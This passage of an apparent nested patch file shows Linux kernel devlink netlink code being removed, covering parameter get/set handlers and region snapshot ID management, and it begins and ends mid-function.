+-}
+-
+-static int devlink_param_get(struct devlink *devlink,
+-			     const struct devlink_param *param,
+-			     struct devlink_param_gset_ctx *ctx)
+-{
+-	if (!param->get || devlink->reload_failed)
+-		return -EOPNOTSUPP;
+-	return param->get(devlink, param->id, ctx);
+-}
+-
+-static int devlink_param_set(struct devlink *devlink,
+-			     const struct devlink_param *param,
+-			     struct devlink_param_gset_ctx *ctx)
+-{
+-	if (!param->set || devlink->reload_failed)
+-		return -EOPNOTSUPP;
+-	return param->set(devlink, param->id, ctx);
+-}
+-
+-static int
+-devlink_param_type_to_nla_type(enum devlink_param_type param_type)
+-{
+-	switch (param_type) {
+-	case DEVLINK_PARAM_TYPE_U8:
+-		return NLA_U8;
+-	case DEVLINK_PARAM_TYPE_U16:
+-		return NLA_U16;
+-	case DEVLINK_PARAM_TYPE_U32:
+-		return NLA_U32;
+-	case DEVLINK_PARAM_TYPE_STRING:
+-		return NLA_STRING;
+-	case DEVLINK_PARAM_TYPE_BOOL:
+-		return NLA_FLAG;
+-	default:
+-		return -EINVAL;
+-	}
+-}
+-
+-static int
+-devlink_nl_param_value_fill_one(struct sk_buff *msg,
+-				enum devlink_param_type type,
+-				enum devlink_param_cmode cmode,
+-				union devlink_param_value val)
+-{
+-	struct nlattr *param_value_attr;
+-
+-	param_value_attr = nla_nest_start_noflag(msg,
+-						 DEVLINK_ATTR_PARAM_VALUE);
+-	if (!param_value_attr)
+-		goto nla_put_failure;
+-
+-	if (nla_put_u8(msg, DEVLINK_ATTR_PARAM_VALUE_CMODE, cmode))
+-		goto value_nest_cancel;
+-
+-	switch (type) {
+-	case DEVLINK_PARAM_TYPE_U8:
+-		if (nla_put_u8(msg, DEVLINK_ATTR_PARAM_VALUE_DATA, val.vu8))
+-			goto value_nest_cancel;
+-		break;
+-	case DEVLINK_PARAM_TYPE_U16:
+-		if (nla_put_u16(msg, DEVLINK_ATTR_PARAM_VALUE_DATA, val.vu16))
+-			goto value_nest_cancel;
+-		break;
+-	case DEVLINK_PARAM_TYPE_U32:
+-		if (nla_put_u32(msg, DEVLINK_ATTR_PARAM_VALUE_DATA, val.vu32))
+-			goto value_nest_cancel;
+-		break;
+-	case DEVLINK_PARAM_TYPE_STRING:
+-		if (nla_put_string(msg, DEVLINK_ATTR_PARAM_VALUE_DATA,
+-				   val.vstr))
+-			goto value_nest_cancel;
+-		break;
+-	case DEVLINK_PARAM_TYPE_BOOL:
+-		if (val.vbool &&
+-		    nla_put_flag(msg, DEVLINK_ATTR_PARAM_VALUE_DATA))
+-			goto value_nest_cancel;
+-		break;
+-	}
+-
+-	nla_nest_end(msg, param_value_attr);
+-	return 0;
+-
+-value_nest_cancel:
+-	nla_nest_cancel(msg, param_value_attr);
+-nla_put_failure:
+-	return -EMSGSIZE;
+-}
+-
+-static int devlink_nl_param_fill(struct sk_buff *msg, struct devlink *devlink,
+-				 unsigned int port_index,
+-				 struct devlink_param_item *param_item,
+-				 enum devlink_command cmd,
+-				 u32 portid, u32 seq, int flags)
+-{
+-	union devlink_param_value param_value[DEVLINK_PARAM_CMODE_MAX + 1];
+-	bool param_value_set[DEVLINK_PARAM_CMODE_MAX + 1] = {};
+-	const struct devlink_param *param = param_item->param;
+-	struct devlink_param_gset_ctx ctx;
+-	struct nlattr *param_values_list;
+-	struct nlattr *param_attr;
+-	int nla_type;
+-	void *hdr;
+-	int err;
+-	int i;
+-
+-	/* Get value from driver part to driverinit configuration mode */
+-	for (i = 0; i <= DEVLINK_PARAM_CMODE_MAX; i++) {
+-		if (!devlink_param_cmode_is_supported(param, i))
+-			continue;
+-		if (i == DEVLINK_PARAM_CMODE_DRIVERINIT) {
+-			if (!param_item->driverinit_value_valid)
+-				return -EOPNOTSUPP;
+-			param_value[i] = param_item->driverinit_value;
+-		} else {
+-			ctx.cmode = i;
+-			err = devlink_param_get(devlink, param, &ctx);
+-			if (err)
+-				return err;
+-			param_value[i] = ctx.val;
+-		}
+-		param_value_set[i] = true;
+-	}
+-
+-	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
+-	if (!hdr)
+-		return -EMSGSIZE;
+-
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto genlmsg_cancel;
+-
+-	if (cmd == DEVLINK_CMD_PORT_PARAM_GET ||
+-	    cmd == DEVLINK_CMD_PORT_PARAM_NEW ||
+-	    cmd == DEVLINK_CMD_PORT_PARAM_DEL)
+-		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_INDEX, port_index))
+-			goto genlmsg_cancel;
+-
+-	param_attr = nla_nest_start_noflag(msg, DEVLINK_ATTR_PARAM);
+-	if (!param_attr)
+-		goto genlmsg_cancel;
+-	if (nla_put_string(msg, DEVLINK_ATTR_PARAM_NAME, param->name))
+-		goto param_nest_cancel;
+-	if (param->generic && nla_put_flag(msg, DEVLINK_ATTR_PARAM_GENERIC))
+-		goto param_nest_cancel;
+-
+-	nla_type = devlink_param_type_to_nla_type(param->type);
+-	if (nla_type < 0)
+-		goto param_nest_cancel;
+-	if (nla_put_u8(msg, DEVLINK_ATTR_PARAM_TYPE, nla_type))
+-		goto param_nest_cancel;
+-
+-	param_values_list = nla_nest_start_noflag(msg,
+-						  DEVLINK_ATTR_PARAM_VALUES_LIST);
+-	if (!param_values_list)
+-		goto param_nest_cancel;
+-
+-	for (i = 0; i <= DEVLINK_PARAM_CMODE_MAX; i++) {
+-		if (!param_value_set[i])
+-			continue;
+-		err = devlink_nl_param_value_fill_one(msg, param->type,
+-						      i, param_value[i]);
+-		if (err)
+-			goto values_list_nest_cancel;
+-	}
+-
+-	nla_nest_end(msg, param_values_list);
+-	nla_nest_end(msg, param_attr);
+-	genlmsg_end(msg, hdr);
+-	return 0;
+-
+-values_list_nest_cancel:
+-	nla_nest_end(msg, param_values_list);
+-param_nest_cancel:
+-	nla_nest_cancel(msg, param_attr);
+-genlmsg_cancel:
+-	genlmsg_cancel(msg, hdr);
+-	return -EMSGSIZE;
+-}
+-
+-static void devlink_param_notify(struct devlink *devlink,
+-				 unsigned int port_index,
+-				 struct devlink_param_item *param_item,
+-				 enum devlink_command cmd)
+-{
+-	struct sk_buff *msg;
+-	int err;
+-
+-	WARN_ON(cmd != DEVLINK_CMD_PARAM_NEW && cmd != DEVLINK_CMD_PARAM_DEL &&
+-		cmd != DEVLINK_CMD_PORT_PARAM_NEW &&
+-		cmd != DEVLINK_CMD_PORT_PARAM_DEL);
+-	ASSERT_DEVLINK_REGISTERED(devlink);
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return;
+-	err = devlink_nl_param_fill(msg, devlink, port_index, param_item, cmd,
+-				    0, 0, 0);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return;
+-	}
+-
+-	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink),
+-				msg, 0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
+-}
+-
+-static int devlink_nl_cmd_param_get_dumpit(struct sk_buff *msg,
+-					   struct netlink_callback *cb)
+-{
+-	struct devlink_param_item *param_item;
+-	struct devlink *devlink;
+-	int start = cb->args[0];
+-	unsigned long index;
+-	int idx = 0;
+-	int err = 0;
+-
+-	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
+-		devl_lock(devlink);
+-		list_for_each_entry(param_item, &devlink->param_list, list) {
+-			if (idx < start) {
+-				idx++;
+-				continue;
+-			}
+-			err = devlink_nl_param_fill(msg, devlink, 0, param_item,
+-						    DEVLINK_CMD_PARAM_GET,
+-						    NETLINK_CB(cb->skb).portid,
+-						    cb->nlh->nlmsg_seq,
+-						    NLM_F_MULTI);
+-			if (err == -EOPNOTSUPP) {
+-				err = 0;
+-			} else if (err) {
+-				devl_unlock(devlink);
+-				devlink_put(devlink);
+-				goto out;
+-			}
+-			idx++;
+-		}
+-		devl_unlock(devlink);
+-		devlink_put(devlink);
+-	}
+-out:
+-	if (err != -EMSGSIZE)
+-		return err;
+-
+-	cb->args[0] = idx;
+-	return msg->len;
+-}
+-
+-static int
+-devlink_param_type_get_from_info(struct genl_info *info,
+-				 enum devlink_param_type *param_type)
+-{
+-	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_PARAM_TYPE))
+-		return -EINVAL;
+-
+-	switch (nla_get_u8(info->attrs[DEVLINK_ATTR_PARAM_TYPE])) {
+-	case NLA_U8:
+-		*param_type = DEVLINK_PARAM_TYPE_U8;
+-		break;
+-	case NLA_U16:
+-		*param_type = DEVLINK_PARAM_TYPE_U16;
+-		break;
+-	case NLA_U32:
+-		*param_type = DEVLINK_PARAM_TYPE_U32;
+-		break;
+-	case NLA_STRING:
+-		*param_type = DEVLINK_PARAM_TYPE_STRING;
+-		break;
+-	case NLA_FLAG:
+-		*param_type = DEVLINK_PARAM_TYPE_BOOL;
+-		break;
+-	default:
+-		return -EINVAL;
+-	}
+-
+-	return 0;
+-}
+-
+-static int
+-devlink_param_value_get_from_info(const struct devlink_param *param,
+-				  struct genl_info *info,
+-				  union devlink_param_value *value)
+-{
+-	struct nlattr *param_data;
+-	int len;
+-
+-	param_data = info->attrs[DEVLINK_ATTR_PARAM_VALUE_DATA];
+-
+-	if (param->type != DEVLINK_PARAM_TYPE_BOOL && !param_data)
+-		return -EINVAL;
+-
+-	switch (param->type) {
+-	case DEVLINK_PARAM_TYPE_U8:
+-		if (nla_len(param_data) != sizeof(u8))
+-			return -EINVAL;
+-		value->vu8 = nla_get_u8(param_data);
+-		break;
+-	case DEVLINK_PARAM_TYPE_U16:
+-		if (nla_len(param_data) != sizeof(u16))
+-			return -EINVAL;
+-		value->vu16 = nla_get_u16(param_data);
+-		break;
+-	case DEVLINK_PARAM_TYPE_U32:
+-		if (nla_len(param_data) != sizeof(u32))
+-			return -EINVAL;
+-		value->vu32 = nla_get_u32(param_data);
+-		break;
+-	case DEVLINK_PARAM_TYPE_STRING:
+-		len = strnlen(nla_data(param_data), nla_len(param_data));
+-		if (len == nla_len(param_data) ||
+-		    len >= __DEVLINK_PARAM_MAX_STRING_VALUE)
+-			return -EINVAL;
+-		strcpy(value->vstr, nla_data(param_data));
+-		break;
+-	case DEVLINK_PARAM_TYPE_BOOL:
+-		if (param_data && nla_len(param_data))
+-			return -EINVAL;
+-		value->vbool = nla_get_flag(param_data);
+-		break;
+-	}
+-	return 0;
+-}
+-
+-static struct devlink_param_item *
+-devlink_param_get_from_info(struct list_head *param_list,
+-			    struct genl_info *info)
+-{
+-	char *param_name;
+-
+-	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_PARAM_NAME))
+-		return NULL;
+-
+-	param_name = nla_data(info->attrs[DEVLINK_ATTR_PARAM_NAME]);
+-	return devlink_param_find_by_name(param_list, param_name);
+-}
+-
+-static int devlink_nl_cmd_param_get_doit(struct sk_buff *skb,
+-					 struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_param_item *param_item;
+-	struct sk_buff *msg;
+-	int err;
+-
+-	param_item = devlink_param_get_from_info(&devlink->param_list, info);
+-	if (!param_item)
+-		return -EINVAL;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	err = devlink_nl_param_fill(msg, devlink, 0, param_item,
+-				    DEVLINK_CMD_PARAM_GET,
+-				    info->snd_portid, info->snd_seq, 0);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return err;
+-	}
+-
+-	return genlmsg_reply(msg, info);
+-}
+-
+-static int __devlink_nl_cmd_param_set_doit(struct devlink *devlink,
+-					   unsigned int port_index,
+-					   struct list_head *param_list,
+-					   struct genl_info *info,
+-					   enum devlink_command cmd)
+-{
+-	enum devlink_param_type param_type;
+-	struct devlink_param_gset_ctx ctx;
+-	enum devlink_param_cmode cmode;
+-	struct devlink_param_item *param_item;
+-	const struct devlink_param *param;
+-	union devlink_param_value value;
+-	int err = 0;
+-
+-	param_item = devlink_param_get_from_info(param_list, info);
+-	if (!param_item)
+-		return -EINVAL;
+-	param = param_item->param;
+-	err = devlink_param_type_get_from_info(info, &param_type);
+-	if (err)
+-		return err;
+-	if (param_type != param->type)
+-		return -EINVAL;
+-	err = devlink_param_value_get_from_info(param, info, &value);
+-	if (err)
+-		return err;
+-	if (param->validate) {
+-		err = param->validate(devlink, param->id, value, info->extack);
+-		if (err)
+-			return err;
+-	}
+-
+-	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_PARAM_VALUE_CMODE))
+-		return -EINVAL;
+-	cmode = nla_get_u8(info->attrs[DEVLINK_ATTR_PARAM_VALUE_CMODE]);
+-	if (!devlink_param_cmode_is_supported(param, cmode))
+-		return -EOPNOTSUPP;
+-
+-	if (cmode == DEVLINK_PARAM_CMODE_DRIVERINIT) {
+-		if (param->type == DEVLINK_PARAM_TYPE_STRING)
+-			strcpy(param_item->driverinit_value.vstr, value.vstr);
+-		else
+-			param_item->driverinit_value = value;
+-		param_item->driverinit_value_valid = true;
+-	} else {
+-		if (!param->set)
+-			return -EOPNOTSUPP;
+-		ctx.val = value;
+-		ctx.cmode = cmode;
+-		err = devlink_param_set(devlink, param, &ctx);
+-		if (err)
+-			return err;
+-	}
+-
+-	devlink_param_notify(devlink, port_index, param_item, cmd);
+-	return 0;
+-}
+-
+-static int devlink_nl_cmd_param_set_doit(struct sk_buff *skb,
+-					 struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-
+-	return __devlink_nl_cmd_param_set_doit(devlink, 0, &devlink->param_list,
+-					       info, DEVLINK_CMD_PARAM_NEW);
+-}
+-
+-static int devlink_nl_cmd_port_param_get_dumpit(struct sk_buff *msg,
+-						struct netlink_callback *cb)
+-{
+-	NL_SET_ERR_MSG_MOD(cb->extack, "Port params are not supported");
+-	return msg->len;
+-}
+-
+-static int devlink_nl_cmd_port_param_get_doit(struct sk_buff *skb,
+-					      struct genl_info *info)
+-{
+-	NL_SET_ERR_MSG_MOD(info->extack, "Port params are not supported");
+-	return -EINVAL;
+-}
+-
+-static int devlink_nl_cmd_port_param_set_doit(struct sk_buff *skb,
+-					      struct genl_info *info)
+-{
+-	NL_SET_ERR_MSG_MOD(info->extack, "Port params are not supported");
+-	return -EINVAL;
+-}
+-
+-static int devlink_nl_region_snapshot_id_put(struct sk_buff *msg,
+-					     struct devlink *devlink,
+-					     struct devlink_snapshot *snapshot)
+-{
+-	struct nlattr *snap_attr;
+-	int err;
+-
+-	snap_attr = nla_nest_start_noflag(msg, DEVLINK_ATTR_REGION_SNAPSHOT);
+-	if (!snap_attr)
+-		return -EINVAL;
+-
+-	err = nla_put_u32(msg, DEVLINK_ATTR_REGION_SNAPSHOT_ID, snapshot->id);
+-	if (err)
+-		goto nla_put_failure;
+-
+-	nla_nest_end(msg, snap_attr);
+-	return 0;
+-
+-nla_put_failure:
+-	nla_nest_cancel(msg, snap_attr);
+-	return err;
+-}
+-
+-static int devlink_nl_region_snapshots_id_put(struct sk_buff *msg,
+-					      struct devlink *devlink,
+-					      struct devlink_region *region)
+-{
+-	struct devlink_snapshot *snapshot;
+-	struct nlattr *snapshots_attr;
+-	int err;
+-
+-	snapshots_attr = nla_nest_start_noflag(msg,
+-					       DEVLINK_ATTR_REGION_SNAPSHOTS);
+-	if (!snapshots_attr)
+-		return -EINVAL;
+-
+-	list_for_each_entry(snapshot, &region->snapshot_list, list) {
+-		err = devlink_nl_region_snapshot_id_put(msg, devlink, snapshot);
+-		if (err)
+-			goto nla_put_failure;
+-	}
+-
+-	nla_nest_end(msg, snapshots_attr);
+-	return 0;
+-
+-nla_put_failure:
+-	nla_nest_cancel(msg, snapshots_attr);
+-	return err;
+-}
+-
+-static int devlink_nl_region_fill(struct sk_buff *msg, struct devlink *devlink,
+-				  enum devlink_command cmd, u32 portid,
+-				  u32 seq, int flags,
+-				  struct devlink_region *region)
+-{
+-	void *hdr;
+-	int err;
+-
+-	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
+-	if (!hdr)
+-		return -EMSGSIZE;
+-
+-	err = devlink_nl_put_handle(msg, devlink);
+-	if (err)
+-		goto nla_put_failure;
+-
+-	if (region->port) {
+-		err = nla_put_u32(msg, DEVLINK_ATTR_PORT_INDEX,
+-				  region->port->index);
+-		if (err)
+-			goto nla_put_failure;
+-	}
+-
+-	err = nla_put_string(msg, DEVLINK_ATTR_REGION_NAME, region->ops->name);
+-	if (err)
+-		goto nla_put_failure;
+-
+-	err = nla_put_u64_64bit(msg, DEVLINK_ATTR_REGION_SIZE,
+-				region->size,
+-				DEVLINK_ATTR_PAD);
+-	if (err)
+-		goto nla_put_failure;
+-
+-	err = nla_put_u32(msg, DEVLINK_ATTR_REGION_MAX_SNAPSHOTS,
+-			  region->max_snapshots);
+-	if (err)
+-		goto nla_put_failure;
+-
+-	err = devlink_nl_region_snapshots_id_put(msg, devlink, region);
+-	if (err)
+-		goto nla_put_failure;
+-
+-	genlmsg_end(msg, hdr);
+-	return 0;
+-
+-nla_put_failure:
+-	genlmsg_cancel(msg, hdr);
+-	return err;
+-}
+-
+-static struct sk_buff *
+-devlink_nl_region_notify_build(struct devlink_region *region,
+-			       struct devlink_snapshot *snapshot,
+-			       enum devlink_command cmd, u32 portid, u32 seq)
+-{
+-	struct devlink *devlink = region->devlink;
+-	struct sk_buff *msg;
+-	void *hdr;
+-	int err;
+-
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return ERR_PTR(-ENOMEM);
+-
+-	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, 0, cmd);
+-	if (!hdr) {
+-		err = -EMSGSIZE;
+-		goto out_free_msg;
+-	}
+-
+-	err = devlink_nl_put_handle(msg, devlink);
+-	if (err)
+-		goto out_cancel_msg;
+-
+-	if (region->port) {
+-		err = nla_put_u32(msg, DEVLINK_ATTR_PORT_INDEX,
+-				  region->port->index);
+-		if (err)
+-			goto out_cancel_msg;
+-	}
+-
+-	err = nla_put_string(msg, DEVLINK_ATTR_REGION_NAME,
+-			     region->ops->name);
+-	if (err)
+-		goto out_cancel_msg;
+-
+-	if (snapshot) {
+-		err = nla_put_u32(msg, DEVLINK_ATTR_REGION_SNAPSHOT_ID,
+-				  snapshot->id);
+-		if (err)
+-			goto out_cancel_msg;
+-	} else {
+-		err = nla_put_u64_64bit(msg, DEVLINK_ATTR_REGION_SIZE,
+-					region->size, DEVLINK_ATTR_PAD);
+-		if (err)
+-			goto out_cancel_msg;
+-	}
+-	genlmsg_end(msg, hdr);
+-
+-	return msg;
+-
+-out_cancel_msg:
+-	genlmsg_cancel(msg, hdr);
+-out_free_msg:
+-	nlmsg_free(msg);
+-	return ERR_PTR(err);
+-}
+-
+-static void devlink_nl_region_notify(struct devlink_region *region,
+-				     struct devlink_snapshot *snapshot,
+-				     enum devlink_command cmd)
+-{
+-	struct devlink *devlink = region->devlink;
+-	struct sk_buff *msg;
+-
+-	WARN_ON(cmd != DEVLINK_CMD_REGION_NEW && cmd != DEVLINK_CMD_REGION_DEL);
+-	if (!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED))
+-		return;
+-
+-	msg = devlink_nl_region_notify_build(region, snapshot, cmd, 0, 0);
+-	if (IS_ERR(msg))
+-		return;
+-
+-	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink), msg,
+-				0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
+-}
+-
+-/**
+- * __devlink_snapshot_id_increment - Increment number of snapshots using an id
+- *	@devlink: devlink instance
+- *	@id: the snapshot id
+- *
+- *	Track when a new snapshot begins using an id. Load the count for the
+- *	given id from the snapshot xarray, increment it, and store it back.
+- *
+- *	Called when a new snapshot is created with the given id.
+- *
+- *	The id *must* have been previously allocated by
+- *	devlink_region_snapshot_id_get().
+- *
+- *	Returns 0 on success, or an error on failure.
+- */
+-static int __devlink_snapshot_id_increment(struct devlink *devlink, u32 id)
+-{
+-	unsigned long count;
+-	void *p;
+-	int err;
+-
+-	xa_lock(&devlink->snapshot_ids);
+-	p = xa_load(&devlink->snapshot_ids, id);
+-	if (WARN_ON(!p)) {
+-		err = -EINVAL;
+-		goto unlock;
+-	}
+-
+-	if (WARN_ON(!xa_is_value(p))) {
+-		err = -EINVAL;
+-		goto unlock;
+-	}
+-
+-	count = xa_to_value(p);
+-	count++;
+-
+-	err = xa_err(__xa_store(&devlink->snapshot_ids, id, xa_mk_value(count),
+-				GFP_ATOMIC));
+-unlock:
+-	xa_unlock(&devlink->snapshot_ids);
+-	return err;
+-}
+-
+-/**
+- * __devlink_snapshot_id_decrement - Decrease number of snapshots using an id
+- *	@devlink: devlink instance
+- *	@id: the snapshot id
+- *
+- *	Track when a snapshot is deleted and stops using an id. Load the count
+- *	for the given id from the snapshot xarray, decrement it, and store it
+- *	back.
+- *
+- *	If the count reaches zero, erase this id from the xarray, freeing it
+- *	up for future re-use by devlink_region_snapshot_id_get().
+- *
+- *	Called when a snapshot using the given id is deleted, and when the
+- *	initial allocator of the id is finished using it.
+- */
+-static void __devlink_snapshot_id_decrement(struct devlink *devlink, u32 id)
+-{
+-	unsigned long count;
+-	void *p;
+-
+-	xa_lock(&devlink->snapshot_ids);
+-	p = xa_load(&devlink->snapshot_ids, id);
+-	if (WARN_ON(!p))
+-		goto unlock;
+-
+-	if (WARN_ON(!xa_is_value(p)))
+-		goto unlock;
+-
+-	count = xa_to_value(p);
+-
+-	if (count > 1) {
+-		count--;
+-		__xa_store(&devlink->snapshot_ids, id, xa_mk_value(count),
+-			   GFP_ATOMIC);
+-	} else {
+-		/* If this was the last user, we can erase this id */
+-		__xa_erase(&devlink->snapshot_ids, id);
+-	}
+-unlock:
+-	xa_unlock(&devlink->snapshot_ids);
+-}
+-
+-/**
+- *	__devlink_snapshot_id_insert - Insert a specific snapshot ID
+- *	@devlink: devlink instance
+- *	@id: the snapshot id
+- *
+- *	Mark the given snapshot id as used by inserting a zero value into the
+- *	snapshot xarray.
+- *
+- *	This must be called while holding the devlink instance lock. Unlike
+- *	devlink_snapshot_id_get, the initial reference count is zero, not one.
+- *	It is expected that the id will immediately be used before
+- *	releasing the devlink instance lock.
+- *
+- *	Returns zero on success, or an error code if the snapshot id could not
+- *	be inserted.
+- */
+-static int __devlink_snapshot_id_insert(struct devlink *devlink, u32 id)
+-{
+-	int err;
+-
+-	xa_lock(&devlink->snapshot_ids);
+-	if (xa_load(&devlink->snapshot_ids, id)) {
+-		xa_unlock(&devlink->snapshot_ids);
+-		return -EEXIST;
+-	}
+-	err = xa_err(__xa_store(&devlink->snapshot_ids, id, xa_mk_value(0),
+-				GFP_ATOMIC));
+-	xa_unlock(&devlink->snapshot_ids);
+-	return err;
+-}
+-
+-/**
+- *	__devlink_region_snapshot_id_get - get snapshot ID
+- *	@devlink: devlink instance
+- *	@id: storage to return snapshot id
+- *
+- *	Allocates a new snapshot id. Returns zero on success, or a negative
+- *	error on failure. Must be called while holding the devlink instance
+- *	lock.
+- *
+- *	Snapshot IDs are tracked using an xarray which stores the number of
+- *	users of the snapshot id.
+- *
+- *	Note that the caller of this function counts as a 'user', in order to
+- *	avoid race conditions. The caller must release its hold on the
+- *	snapshot by using devlink_region_snapshot_id_put.
+- */
+-static int __devlink_region_snapshot_id_get(struct devlink *devlink, u32 *id)
+-{
+-	return xa_alloc(&devlink->snapshot_ids, id, xa_mk_value(1),
+-			xa_limit_32b, GFP_KERNEL);
+-}
+-
+-/**
+- *	__devlink_region_snapshot_create - create a new snapshot
+- *	This will add a new snapshot of a region. The snapshot
+- *	will be stored on the region struct and can be accessed
+- *	from devlink. This is useful for future analyses of snapshots.
+- *	Multiple snapshots can be created on a region.
+- *	The @snapshot_id should be obtained using the getter function.
+- *
+- *	Must be called only while holding the region snapshot lock.
+- *
+- *	@region: devlink region of the snapshot
+- *	@data: snapshot data
+- *	@snapshot_id: snapshot id to be created
+- */
+-static int
+-__devlink_region_snapshot_create(struct devlink_region *region,
+-				 u8 *data, u32 snapshot_id)
+-{
+-	struct devlink *devlink = region->devlink;
+-	struct devlink_snapshot *snapshot;
+-	int err;
+-
+-	lockdep_assert_held(&region->snapshot_lock);
+-
+-	/* check if region can hold one more snapshot */
+-	if (region->cur_snapshots == region->max_snapshots)
+-		return -ENOSPC;
+-
+-	if (devlink_region_snapshot_get_by_id(region, snapshot_id))
+-		return -EEXIST;
+-
+-	snapshot = kzalloc(sizeof(*snapshot), GFP_KERNEL);
+-	if (!snapshot)
+-		return -ENOMEM;
+-
+-	err = __devlink_snapshot_id_increment(devlink, snapshot_id);
+-	if (err)
+-		goto err_snapshot_id_increment;
+-
+-	snapshot->id = snapshot_id;
+-	snapshot->region = region;
+-	snapshot->data = data;
+-
+-	list_add_tail(&snapshot->list, &region->snapshot_list);
+-
+-	region->cur_snapshots++;
+-
+-	devlink_nl_region_notify(region, snapshot, DEVLINK_CMD_REGION_NEW);
+-	return 0;
+-
+-err_snapshot_id_increment:
+-	kfree(snapshot);
+-	return err;
+-}
+-
+-static void devlink_region_snapshot_del(struct devlink_region *region,
+-					struct devlink_snapshot *snapshot)
+-{
+-	struct devlink *devlink = region->devlink;
+-
+-	lockdep_assert_held(&region->snapshot_lock);
+-
+-	devlink_nl_region_notify(region, snapshot, DEVLINK_CMD_REGION_DEL);
+-	region->cur_snapshots--;
+-	list_del(&snapshot->list);
+-	region->ops->destructor(snapshot->data);
+-	__devlink_snapshot_id_decrement(devlink, snapshot->id);
+-	kfree(snapshot);
+-}
+-
+-static int devlink_nl_cmd_region_get_doit(struct sk_buff *skb,
+-					  struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_port *port = NULL;
+-	struct devlink_region *region;
+-	const char *region_name;
+-	struct sk_buff *msg;
+-	unsigned int index;
+-	int err;
+-
+-	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_REGION_NAME))
+-		return -EINVAL;
+-
+-	if (info->attrs[DEVLINK_ATTR_PORT_INDEX]) {
+-		index = nla_get_u32(info->attrs[DEVLINK_ATTR_PORT_INDEX]);
+-
+-		port = devlink_port_get_by_index(devlink, index);
+-		if (!port)
+-			return -ENODEV;
+-	}
+-
+-	region_name = nla_data(info->attrs[DEVLINK_ATTR_REGION_NAME]);
+-	if (port)
+-		region = devlink_port_region_get_by_name(port, region_name);
+-	else
+-		region = devlink_region_get_by_name(devlink, region_name);
+-
+-	if (!region)
+-		return -EINVAL;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	err = devlink_nl_region_fill(msg, devlink, DEVLINK_CMD_REGION_GET,
+-				     info->snd_portid, info->snd_seq, 0,
+-				     region);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return err;
+-	}
+-
+-	return genlmsg_reply(msg, info);
+-}
+-
+-static int devlink_nl_cmd_region_get_port_dumpit(struct sk_buff *msg,
+-						 struct netlink_callback *cb,
+-						 struct devlink_port *port,
+-						 int *idx,
+-						 int start)
+-{
+-	struct devlink_region *region;
+-	int err = 0;
+-
+-	list_for_each_entry(region, &port->region_list, list) {
+-		if (*idx < start) {
+-			(*idx)++;
+-			continue;
+-		}
+-		err = devlink_nl_region_fill(msg, port->devlink,
+-					     DEVLINK_CMD_REGION_GET,
+-					     NETLINK_CB(cb->skb).portid,
+-					     cb->nlh->nlmsg_seq,
+-					     NLM_F_MULTI, region);
+-		if (err)
+-			goto out;
+-		(*idx)++;
+-	}
+-
+-out:
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_region_get_devlink_dumpit(struct sk_buff *msg,
+-						    struct netlink_callback *cb,
+-						    struct devlink *devlink,
+-						    int *idx,
+-						    int start)
+-{
+-	struct devlink_region *region;
+-	struct devlink_port *port;
+-	int err = 0;
+-
+-	devl_lock(devlink);
+-	list_for_each_entry(region, &devlink->region_list, list) {
+-		if (*idx < start) {
+-			(*idx)++;
+-			continue;
+-		}
+-		err = devlink_nl_region_fill(msg, devlink,
+-					     DEVLINK_CMD_REGION_GET,
+-					     NETLINK_CB(cb->skb).portid,
+-					     cb->nlh->nlmsg_seq,
+-					     NLM_F_MULTI, region);
+-		if (err)
+-			goto out;
+-		(*idx)++;
+-	}
+-
+-	list_for_each_entry(port, &devlink->port_list, list) {
+-		err = devlink_nl_cmd_region_get_port_dumpit(msg, cb, port, idx,
+-							    start);
+-		if (err)
+-			goto out;
+-	}
+-
+-out:
+-	devl_unlock(devlink);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_region_get_dumpit(struct sk_buff *msg,
+-					    struct netlink_callback *cb)
+-{
+-	struct devlink *devlink;
+-	int start = cb->args[0];
+-	unsigned long index;
+-	int idx = 0;
+-	int err = 0;
+-
+-	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
+-		err = devlink_nl_cmd_region_get_devlink_dumpit(msg, cb, devlink,
+-							       &idx, start);
+-		devlink_put(devlink);
+-		if (err)
+-			goto out;
+-	}
+-out:
+-	cb->args[0] = idx;
+-	return msg->len;
+-}
+-
+-static int devlink_nl_cmd_region_del(struct sk_buff *skb,
+-				     struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_snapshot *snapshot;
+-	struct devlink_port *port = NULL;
+-	struct devlink_region *region;
+-	const char *region_name;
+-	unsigned int index;
+-	u32 snapshot_id;
+-
+-	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_REGION_NAME) ||
+-	    GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_REGION_SNAPSHOT_ID))
+-		return -EINVAL;
+-
